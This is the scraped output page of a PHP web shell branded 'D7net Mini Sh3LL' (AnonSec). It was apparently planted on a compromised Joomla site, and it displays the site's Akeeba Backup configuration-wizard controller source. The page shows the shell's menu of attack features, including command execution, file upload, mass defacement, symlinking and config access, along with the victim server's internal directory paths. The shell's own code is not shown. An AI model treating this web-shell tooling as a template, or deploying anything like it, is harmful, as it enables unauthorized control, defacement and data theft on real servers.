D7net Mini Sh3LL v1

 
OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /var/www/html/hpsc/../hpsclab/js/../download/../../hpsc/../informatica/administrator/components/com_search/../com_akeeba/helpers/../controllers/

 Home   ☍ Command   ☍ Upload File   ☍Info Server   ☍ Buat File   ☍ Mass deface   ☍ Jumping   ☍ Config   ☍ Symlink   ☍ About 

Current File : /var/www/html/hpsc/../hpsclab/js/../download/../../hpsc/../informatica/administrator/components/com_search/../com_akeeba/helpers/../controllers/confwiz.php
<?php
/**
 * @package AkeebaBackup
 * @copyright Copyright (c)2009-2016 Nicholas K. Dionysopoulos
 * @license GNU General Public License version 3, or later
 *
 * @since 1.3
 */

// Protect from unauthorized access
defined('_JEXEC') or die();

/**
 * The Configuration Wizard controller class
 */
class AkeebaControllerConfwiz extends AkeebaControllerDefault
{
	public function  __construct($config = array()) {
		parent::__construct($config);

		$this->modelName = 'AkeebaModelConfwiz';
	}

	public function add()
	{
		$this->display(false);
	}

	public function ajax()
	{
		$act = $this->input->get('act', '', 'cmd');
		$model = F0FModel::getAnInstance('Confwiz', 'AkeebaModel');
		$model->setState('act', $act);
		$ret = $model->runAjax();

		@ob_end_clean();
		echo '###' . json_encode( $ret ) . '###';
		flush();
		JFactory::getApplication()->close();
	}
}

AnonSec - 2021 | Recode By D7net